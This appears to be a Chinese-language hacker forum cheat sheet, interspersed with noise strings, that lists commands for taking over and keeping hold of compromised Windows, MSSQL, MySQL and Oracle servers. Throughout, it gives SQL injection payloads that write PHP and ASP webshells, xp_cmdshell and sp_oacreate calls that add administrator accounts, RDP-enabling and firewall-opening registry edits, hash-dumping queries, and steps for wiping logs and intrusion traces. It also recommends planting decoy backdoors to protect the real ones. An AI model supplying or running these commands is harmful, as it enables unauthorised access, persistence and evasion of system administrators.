% l% f, X) T3 U4 W
1.net user administrator /passwordreq:no/ }( E. w* R7 l0 q+ |
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
4 g7 U4 L' X$ _& [. h& G2.比较巧妙的建克隆号的步骤
3 t1 i8 v m2 f' P4 Y7 r4 `4 ^* W先建一个user的用户
+ l2 N2 z7 P9 A' K l! z* @4 ]; N8 K然后导出注册表。然后在计算机管理里删掉
, ^. H6 d! t4 q. U. g# E3 z3 y. U在导入,在添加为管理员组% W7 c' g* Z" g
3.查radmin密码# {" _$ X) t/ ]# ]7 o: ]
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg& Z" m2 {: ]. H" N1 p
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]; L/ i6 O0 F( _- |, l( M6 D" M
建立一个"services.exe"的项
& R7 ]' l9 n* |# g+ { Y再在其下面建立(字符串值) _5 b0 |! c' B$ J: L$ b
键值为mu ma的全路径( h4 ^/ ^- c( d, U
5.runas /user:guest cmd; M5 B; `" w e1 c
测试用户权限!
! y4 }! R/ \6 V7 r6 `- \6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
7 m9 G F6 W7 r) \7.入侵后漏洞修补、痕迹清理,后门置放:
e& V j/ R7 H* G5 ~" o基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
- h) {$ |- M8 I9 A; W2 H/ g8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
- F! C$ H. V4 G9 t% t! w d3 |3 ]' ^! x$ I/ M" t/ |+ F
for example
7 n; e5 R. y) y1 i% `# n# K0 z, o5 k; j9 ~3 y. E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'6 P. W+ _2 S" f4 s3 W
; o7 W0 Y) W$ x, N4 L8 j% O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'2 X' I- I' X7 R* r/ I4 `
# {. A/ F: c+ a* N* M3 J
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
5 s, e/ y8 {3 k( `如果要启用的话就必须把他加到高级用户模式
# W8 g; C5 ^7 \ X/ }9 S% S! o) {7 {, Y可以直接在注入点那里直接注入
! G6 L2 o7 [. g2 o' m2 M0 E- s) Vid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--5 ]6 h9 k* |. h6 q5 L
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--' b+ H: E K c$ S' D5 S p: j3 ^
或者3 }& }- t: p4 X: }8 Q/ B2 r q
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# P* i) b0 }4 J! y7 C5 J
来恢复cmdshell。- \" r: Z$ o5 G$ P8 G/ a( [
# ^7 _$ F0 Q" S& K9 C
分析器4 s- n; w* X" J+ H" ^1 T
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
0 o6 F+ F1 D+ t6 L1 J" h# \2 [然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")3 ~& V- U3 |" e: K& s$ t$ i; M
10.xp_cmdshell新的恢复办法
. N! \2 {, N9 S. @8 N' Nxp_cmdshell新的恢复办法
* @1 S7 o( Q3 L9 |! c扩展储存过程被删除以后可以有很简单的办法恢复:
; |& @, G. P. u删除
) O4 F) y! ^& P9 v# Odrop procedure sp_addextendedproc0 b5 ~- h4 _9 i
drop procedure sp_oacreate
2 [8 |5 ^$ {' f$ i) Q& hexec sp_dropextendedproc 'xp_cmdshell'( r/ u' D5 n$ \& j+ A
' b: W% J2 V& R: n' F3 c4 Z
恢复7 B5 }: H$ [ W3 v
dbcc addextendedproc ("sp_oacreate","odsole70.dll")3 }& M+ y% F5 M1 }: Q( c! I6 ]4 Z
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")2 G! T3 j) k r: x! e- K& N' m
8 n" L# I1 ]* j( B3 d! F这样可以直接恢复,不用去管sp_addextendedproc是不是存在 m1 R8 d) H/ J- X/ q# _( d
. ]! E' S t6 h1 T
----------------------------- R$ W7 z) ]6 r
" E0 v% f1 K7 [' {+ X# E1 y
删除扩展存储过过程xp_cmdshell的语句:
3 u+ k2 g* r% |4 L7 H9 |& Z6 pexec sp_dropextendedproc 'xp_cmdshell'- c3 I$ }6 i- X1 r& t; C% x
8 r' w+ c' ?, ^恢复cmdshell的sql语句
. a% c' h- r' `6 nexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'8 b3 I6 H- [- }: T! @6 m" i f" q
$ P& I; T9 K" u: u- V) M0 b( H( B, A$ l
开启cmdshell的sql语句
/ A4 f( ]2 z6 |' u! h' h! ~9 H, M
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" E; ?# A4 c/ X- h6 k2 V
/ B" A* }2 z: V/ c判断存储扩展是否存在. t5 @1 c# ]9 C' a" K M. L
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
' c' X7 Y7 N+ Q: o3 O返回结果为1就ok( R: }$ I h: k8 H5 t* K
: K. `" d8 b. Y) ?) q
恢复xp_cmdshell
" z( v$ x1 g3 Sexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'* g5 |# b. { i0 P2 C5 `5 |
返回结果为1就ok6 O, s _! J* U% m! L- m1 |, ?3 J
% }% L% E! m- c3 }' y: S% s否则上传xplog7.0.dll
9 s( s1 {3 j% c% v: K2 I% ]exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'& k8 m; R; A, Y, k: N* D
G5 {; B6 ~0 t) t; P! q
堵上cmdshell的sql语句
$ _7 a! o, Y7 f( Z! N3 d( d' Y' Usp_dropextendedproc "xp_cmdshel
& |9 G& k: f4 ?/ O; r/ G. H' I-------------------------
) |% J; Y" l; H: H3 {清除3389的登录记录用一条系统自带的命令:
, i( R* X# q/ O8 jreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
6 ^* \+ y9 n$ n8 Q
, z z% `- A! Y. r然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
: l2 ?6 p; X5 c在 mysql里查看当前用户的权限- x. `, t) P1 _3 @) u2 X
show grants for
" Q% V! Y6 [- ?
& ~7 @ l |" Q9 A0 `, @: Z以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。. x4 p8 G( Y8 F7 }, A- ?' ?- ?
7 s! K5 X7 l" E: j, g
a. o+ r9 {8 s" jCreate USER 'itpro'@'%' IDENTIFIED BY '123';. |- N& X2 N L! ~/ V( x
* E! p; R, f: y0 h7 Q- T0 A% b
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
& F* f1 `# k+ s" r. ?- l' p+ ?& B D' k7 ^) v
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
, m8 B+ \* Z0 F( I. X- k4 K, l0 ~, _7 p3 T4 x7 L0 V1 {
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;9 r5 l# A1 _( d5 W. d' {
* Y2 B, D2 e2 u* \
搞完事记得删除脚印哟。
# s+ J, ^0 N( p8 f S6 B b8 b' U
7 j# x; [: U( D8 f: ~3 _Drop USER 'itpro'@'%';
! U {! S ] k/ Q4 C$ J8 P2 w% K$ S2 Q1 q% z
Drop DATABASE IF EXISTS `itpro` ;+ G/ |# w9 {# t& Z3 y: J) U
2 F1 V' x: ^* b$ b当前用户获取system权限
# k0 Y2 @% c: C; G6 s4 a- z$ n) x; Nsc Create SuperCMD binPath= "cmd /K start" type= own type= interact$ B0 Y: u3 D( M" F1 d: z; y( L, h
sc start SuperCMD0 n4 G, V- v& B9 m4 M, ^
程序代码' j4 E1 a; P6 S/ @
<SCRIPT LANGUAGE="VBScript">
! {' t# ]. p' m/ V1 X) ]0 N% jset wsnetwork=CreateObject("WSCRIPT.NETWORK")& m/ q# V e5 W2 G7 w3 N
os="WinNT://"&wsnetwork.ComputerName
2 V$ c$ k2 @! I8 gSet ob=GetObject(os)
# R5 T0 T7 N7 V5 wSet oe=GetObject(os&"/Administrators,group")
/ U. J! q7 g& Z9 u$ _Set od=ob.Create("user","nosec")7 R2 f) X1 X0 x! r; k
od.SetPassword "123456abc!@#"
- |6 _; O# c5 u0 ~& xod.SetInfo' M# G$ z: ?9 o' f
Set of=GetObject(os&"/nosec",user)
0 v$ n2 C, w* Qoe.add os&"/nosec"
, ?/ ]9 l# r' N' [+ p t1 {# x</Script>
" M5 d2 E/ ?# a8 T+ a! A<script language=javascript>window.close();</script>
( V1 E _/ I4 M( K2 g8 \; m2 Z* t$ w4 @5 o
5 n2 j# z) G. ~ s
$ z4 y3 h4 p/ H, i
! I) c! V! w: Q8 n突破验证码限制入后台拿shell
6 w) y6 Q; d, ^1 u+ X程序代码
; b2 ]; h2 i" h1 i/ c, d# p* AREGEDIT4
7 l3 ~; t: _1 n+ Z- B8 \: P' e[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ; g, a2 C# |' J) h) W- R' d- r; A
"BlockXBM"=dword:00000000" H0 @, H6 g( U! M- }: v8 u
3 n+ L/ E5 ]0 R- s保存为code.reg,导入注册表,重器IE
. F! F5 ?9 E& U8 `" Q" H+ w就可以了- n7 |/ V+ p& ]* Y9 f6 {$ A* Z% p
union写马 d- m4 j `4 ], c# Q! D0 i
程序代码
) |1 G Y, e3 H' A% Qwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
# G# }1 \3 Q0 w, F. \( e4 F+ L; ]. M$ @
应用在dedecms注射漏洞上,无后台写马$ u4 R* H: P$ G5 m0 s F3 W- @
dedecms后台,无文件管理器,没有outfile权限的时候
9 X! A3 C( {" R, r在插件管理-病毒扫描里' o6 |; X3 r# Q% g# C- C# x
写一句话进include/config_hand.php里
' y4 @ }: e( P3 g' h程序代码& I4 C3 U/ g+ K% z* h/ ]1 |3 \
>';?><?php @eval($_POST[cmd]);?>( b2 J5 O* d) ^* _
! N3 L. B" ^8 {$ x
$ q; t. `* z1 ?" e, |6 g) x7 x& r如上格式
( C1 x4 k3 g8 f7 M9 J- J9 o% g' p4 E5 ?/ t, ~' G( z) o5 O
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
' o1 I+ Q4 i# [- y6 L" t程序代码
9 c' M" s- L0 ~6 C2 R% ?; Aselect username,password from dba_users;: V" \/ w( I7 d
: Y: F& N& r1 E H2 E" ~
& D& ^% W0 W: J$ w- q3 C7 Jmysql远程连接用户* W) Q0 u5 R5 |1 g
程序代码. j, J9 c" b/ Y& t- i& F) ^! T
: I+ Z* k2 r. z: Q
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';) k: T/ h2 e/ C6 E! _9 I4 x' @0 Z% Q/ M
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
: L2 ]9 F+ ~1 r9 y: AMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* m- C, J5 F' z$ l4 E: ^
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;5 c: G! j- A! O, C" L
& y0 E. S; r7 }% R) F& ]; O
/ U# G0 ?" ?' ^7 R; ?+ V j' i# O7 S e
; i8 m4 \( t- V6 [- |( e. y
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0! P$ z* r8 j2 F P4 x! G$ Q- Q0 h" z
# S% P5 Q' b5 Q+ B( }
1.查询终端端口6 C" T2 ~5 B" a) Q, j( Q" Z
0 J' x- g" O( ~+ N: ?0 ^
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber- g" u/ u; f; z3 c* t& Y
8 D. Q4 a* `0 ?% L通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp" E$ y! \) _0 m$ f) c
type tsp.reg
1 E1 {" d1 ~# X- z* q6 D* q; W2 h7 C$ h
2.开启XP&2003终端服务4 U2 {) e7 G' R! M [
$ c+ W1 u- B* P3 n, q# f/ |
2 P% M' I0 @, U- D9 |9 pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
8 B. x* T# K$ m* C7 h. a4 \" M$ C$ ~+ T* n) J( S
; g3 g4 ^/ ^. Q' a0 ?; q3 X
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- |. w& l( U2 |7 Q8 p
4 T1 S6 O% v+ i3.更改终端端口为20008(0x4E28)
$ {4 V/ G# O2 t7 \: r* G0 \) F# Y" K8 n
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f' O3 l' J2 ~( R# F+ ~# m( l
6 S. l9 X- O) n/ `8 l/ B
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f6 S% t* \& `4 {/ P/ O
0 N- P. `. h. P# @4 ]. S4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制3 x" @% i5 q* q
( k8 Y$ O2 M( _* y5 ?
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f- }" E F5 M* b$ s& ?/ Z( C/ O
/ v9 q% y2 a) q- X2 ~) ?4 N9 A
) \& b/ O: Z7 X5.开启Win2000的终端,端口为3389(需重启). b' O- @7 r9 r& S
2 M0 J6 [5 ?. X. K/ ^# recho Windows Registry Editor Version 5.00 >2000.reg
- s$ i5 l( d* i* B4 }echo. >>2000.reg
8 V- l ~2 h, C: {# w, M9 Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg / `) D7 X) K; b/ s% Q. X( t/ x9 H
echo "Enabled"="0" >>2000.reg
) w& b: \/ g$ Y$ `# vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg A+ j6 c4 h9 n5 @' m9 t% T
echo "ShutdownWithoutLogon"="0" >>2000.reg * H9 e+ h7 v: C3 z; k4 w: I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
& }4 u6 f/ H; h/ p$ p; f$ pecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
$ V# J% r9 e% g, b. L+ K( {' lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
3 N& ]5 c! U6 Kecho "TSEnabled"=dword:00000001 >>2000.reg
6 l6 x# O+ o$ U* _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
2 U4 x+ p a7 w" decho "Start"=dword:00000002 >>2000.reg
" I3 d" p/ c: o, ^, lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 1 Q! P4 w+ ^ d; n/ T
echo "Start"=dword:00000002 >>2000.reg
. n6 v6 j- P4 c( K- w5 W& Uecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg $ W" V1 R! _. x& C
echo "Hotkey"="1" >>2000.reg , D' S6 h K2 j( w! t8 O" R! }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 8 Z# [4 J' p' C
echo "ortNumber"=dword:00000D3D >>2000.reg ! u7 g k' B0 w3 Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
0 \ s! s; h3 r5 c0 D, o( B6 l9 Zecho "ortNumber"=dword:00000D3D >>2000.reg. L: o2 w$ j; e. o, S
# K# }) G) q3 S4 S; g* n" F6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
( _$ R: a' H1 z- M. N( U6 V I3 P4 M" [3 B- h; t" J
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf: O) Q' E3 N5 C; D+ H9 |5 D
(set inf=InstallHinfSection DefaultInstall)$ O/ V( L0 G* c. R
echo signature=$chicago$ >> restart.inf
5 _( O' i; u& @echo [defaultinstall] >> restart.inf
/ Z, C x6 U" arundll32 setupapi,%inf% 1 %temp%\restart.inf
' @6 V2 o! u; Z( j0 B
& ?# a) z) C" A* D
+ `' B' ?4 [/ K$ X& S& H, G& s7.禁用TCP/IP端口筛选 (需重启)
9 }. I5 G) I0 j% L5 |6 V4 d2 L" J1 v
% K: |9 u9 a; ~- b. g- `REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f( P y$ e* C5 Q
" o3 k- \) k2 y: P8 }6 u% i
8.终端超出最大连接数时可用下面的命令来连接
2 S/ U: k! C7 b
' G- A, f4 F3 |6 y" U: L! l5 Z& imstsc /v:ip:3389 /console
. G# I% f1 t5 V* Y6 e
0 w; u! M% I& C9.调整NTFS分区权限" g- q; G7 V0 }7 R5 t2 S
$ y6 ]7 X; Z7 t6 ?4 f( ~4 R
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
6 b+ A) |& C9 p& }( ]
5 `, a6 M6 h. O& A3 \cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件), \- G8 q; x8 y+ R2 p2 W" H) m
9 i/ ]0 K( z9 n; i------------------------------------------------------4 T& `, ]5 U: H. [0 b$ F. S
3389.vbs
( C& q9 ~" `) M% _4 X5 |* sOn Error Resume Next
0 N5 l0 C. S- zconst HKEY_LOCAL_MACHINE = &H80000002
. [. G7 E/ l& X, istrComputer = "."9 p' S1 O5 G& ]" ~* }
Set StdOut = WScript.StdOut
# b9 x4 ~& Z% @8 xSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_6 a U- `# t6 P' i5 Q. W9 g
strComputer & "\root\default:StdRegProv")
* k2 n" J" C* ^; [$ ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
9 l2 O; ?. z3 Y- ^2 z$ R& d0 f0 X- \oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ G$ i$ q: t2 y; C/ [' B5 Q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
3 T7 J5 S' F. ~9 L: m5 ?; p Voreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath7 M) c2 \, m o
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
/ M0 ]9 ~0 e( nstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" i4 D; r* n* j4 O) V; a1 e! x& E' h
strValueName = "fDenyTSConnections"2 q6 Q) s* A& Y
dwValue = 07 w/ H% p# e3 z I/ e( r4 P R
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue2 \( @) k: O6 k2 \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
5 S Z. Q0 B* J% d5 Y+ R7 E* b4 FstrValueName = "ortNumber"+ j5 U$ K9 M# a& n
dwValue = 3389
& o* K6 F0 `8 B0 ~! E. G( h/ E voreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 p# [- H& i( l9 G l4 ]$ V
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"3 }+ X* z g' ?, t6 ^+ h0 ^ c3 @
strValueName = "ortNumber"
) Z. b. g7 k8 n E4 m0 G6 ~dwValue = 3389
- Z F t: O$ woreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# ~3 K% P }" d
Set R = CreateObject("WScript.Shell")
6 N# [8 j( x' i0 U" c; [R.run("Shutdown.exe -f -r -t 0") ) W" t& M$ U+ N5 _, o3 t
' G4 Q4 p) Z5 ^删除awgina.dll的注册表键值8 z d0 ^5 |# Y% ^2 B
程序代码
, c! }2 ~3 V1 c( p4 g, V9 G8 y
7 }- J/ c3 E8 z+ i5 hreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
/ k$ }( `# d) b9 x, y5 a
# X. K, K$ V" [$ G! p- d0 B3 B' T7 u) {5 o6 {9 \( n, O
. e) F1 x$ m( d
; d- P+ d- n2 G$ x d程序代码
; h0 b2 f |0 N7 S. l' oHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash3 H* j" X; E" q0 c
7 g# H4 J6 B+ B6 w设置为1,关闭LM Hash
) W6 S, A6 j/ t$ j3 N5 E( {5 b* V+ i$ F% e' e% u
数据库安全:入侵Oracle数据库常用操作命令
1 `8 R$ ~4 h$ J) Z! l* T: a: V最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
; d" K6 s) p/ z6 ]9 i1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。0 g; H4 z6 b4 i* P5 C8 e
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
_+ m; Z" `9 _6 _- m- e3、SQL>connect / as sysdba ;(as sysoper)或1 _9 _5 U& p( J% c
connect internal/oracle AS SYSDBA ;(scott/tiger)3 m$ `# R3 d0 d4 l4 M: r
conn sys/change_on_install as sysdba;
9 o0 [$ G! A$ h! h6 O1 t1 \8 T4、SQL>startup; 启动数据库实例
1 d" {) u2 A# k* i! `4 _" w5、查看当前的所有数据库: select * from v$database;
: ]5 N0 o0 G6 A$ I/ p. E' Cselect name from v$database;. ~5 B: K: L: Z% g# B- E6 G8 p& N% F4 j
6、desc v$databases; 查看数据库结构字段! M. R( ]1 S% c' B6 P4 n
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
/ x$ G6 N3 @+ z0 A# a: W8 h: ASQL>select * from V_$PWFILE_USERS;
, _. k+ Z$ R: H7 O$ H5 j8 BShow user;查看当前数据库连接用户
! U+ b" ]( c8 x8、进入test数据库:database test;
+ T( C: a# F* {" G( r3 @9、查看所有的数据库实例:select * from v$instance;" z: d$ k7 Z# {& }) {
如:ora9i
* q; m4 m+ Z+ X10、查看当前库的所有数据表:
3 I( |2 ^) a3 U) f5 [; m2 [SQL> select TABLE_NAME from all_tables;: Q6 y1 |3 N" |% s) B2 B
select * from all_tables;6 h8 \7 \! T* K5 d" \8 ]& T
SQL> select table_name from all_tables where table_name like '%u%'; m4 u) t5 _; F) @( R6 A
TABLE_NAME
6 p- X: [8 B( k7 @# t9 h( h3 \. z------------------------------. ~ g8 A; C" L- i
_default_auditing_options_
, R# ]# i6 T) v; `; k11、查看表结构:desc all_tables;
9 {2 q8 X* M) O! o12、显示CQI.T_BBS_XUSER的所有字段结构:. v* N! K3 R6 p w! U, x* y+ ]
desc CQI.T_BBS_XUSER;1 f7 B) e1 @( B& E3 Y! F" i
13、获得CQI.T_BBS_XUSER表中的记录:7 c0 ^0 R1 l5 _+ C4 S- F
select * from CQI.T_BBS_XUSER;' c$ L& V3 h+ h3 I
14、增加数据库用户:(test11/test), H: L& g$ `0 Z9 G$ A* y1 X
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
" h" A: O; S7 N& ]9 Y$ d15、用户授权:0 N' P- ]7 C) x, f {
grant connect,resource,dba to test11;8 ?9 {5 `4 M( B, ~
grant sysdba to test11;
& \3 q/ I2 E2 C! J7 J2 ecommit;
~6 k, o8 g" I16、更改数据库用户的密码:(将sys与system的密码改为test.)! _3 R: S. Q* x- j y, w5 H9 q; ~& M
alter user sys indentified by test;8 r" u5 L& C9 i w1 w/ c
alter user system indentified by test;
5 W3 L" i5 D9 [& H2 V+ n! s) h: W
( J+ P. g# M7 O8 Y$ h- p5 I( _/ _4 s. HapplicationContext-util.xml# ?. \2 F( F" u8 G, i
applicationContext.xml
6 E" v* Q* J' T4 u- mstruts-config.xml
" Q1 J: ^4 P( A" j# \; D2 Q& ] Lweb.xml7 W/ @" t* H% b' A% |% i- T: d, C% b5 F
server.xml; s, i& [' D: ~) T
tomcat-users.xml! D4 Q* i6 f3 \$ L$ S6 M- I, U
hibernate.cfg.xml9 ]0 r5 T) l/ K# m' j3 \; E" y
database_pool_config.xml
, K- o* s3 R5 r. g9 t
6 m2 m) @7 w4 A! S! s4 g2 a1 v
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
# y( q V( N. M0 c# Q8 _; k- M\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
1 S w) O4 `& C1 X, g1 V\WEB-INF\struts-config.xml 文件目录结构
, U3 [8 m U3 t9 G3 C. {
6 @0 p$ H8 L+ o* Uspring.properties 里边包含hibernate.cfg.xml的名称
2 D* X( U; f3 L# a: k$ u6 H/ A; a& y( Z" n2 }
- r% \ B: |' N: z+ uC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
: a% k2 L" ?- w# S3 ?& ?$ H% `' v* t0 I( U
如果都找不到 那就看看class文件吧。。7 q6 u/ q* E& r* v6 X9 v
: n* r" K: G8 T {% s测试1:
4 M$ A/ G% D: RSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
* Q' Y# U1 D q
7 g) D/ Y$ ]1 [6 i* O) g) y5 o* \* E测试2:6 r- g' y2 k) f8 Q9 ?+ e
0 Z! v& c0 ]" t6 N! Q; V
create table dirs(paths varchar(100),paths1 varchar(100), id int)
* n9 E4 i" m& m
5 p& v; R( H5 C/ k. ndelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
; X2 N5 K2 `& N1 m8 O4 p) k+ i
+ @) v3 C/ A8 }" A7 fSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1: _. o8 u) i/ ?
* d4 R Q4 j, g
查看虚拟机中的共享文件:# U. D* {4 j) U9 [! k
在虚拟机中的cmd中执行
# p+ s @$ F5 t; Z" r! f\\.host\Shared Folders
' n. k6 A( M# z/ J" m, O9 A5 R+ n& {) h. V% `; U9 [7 Z# S
cmdshell下找终端的技巧
! S3 j( A A- `& e r% ?找终端: . g' N/ B2 [# |, J7 U
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 5 Q0 e5 }3 s% g' N6 J! f5 O
而终端所对应的服务名为:TermService ( r- z0 M; E' q3 `4 @
第二步:用netstat -ano命令,列出所有端口对应的PID值!
1 Q8 L7 m- M8 t 找到PID值所对应的端口
0 [3 R2 c" G4 ^3 c" m. h% P6 p& E$ q4 d
查询sql server 2005中的密码hash
4 U) R. p6 {, M( [SELECT password_hash FROM sys.sql_logins where name='sa'9 h* Y; X, V) b, J8 s. r# _: B4 I4 R
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a* N* m4 T2 m3 `7 G. o. l' L4 v" G
access中导出shell
6 Q2 z0 I( p3 e# P8 v# B" w3 _0 \( u" S. l+ A+ W8 Z
中文版本操作系统中针对mysql添加用户完整代码:
' P% N; ^ H% F3 I$ G! g, y/ W! J. ~ Y
use test;
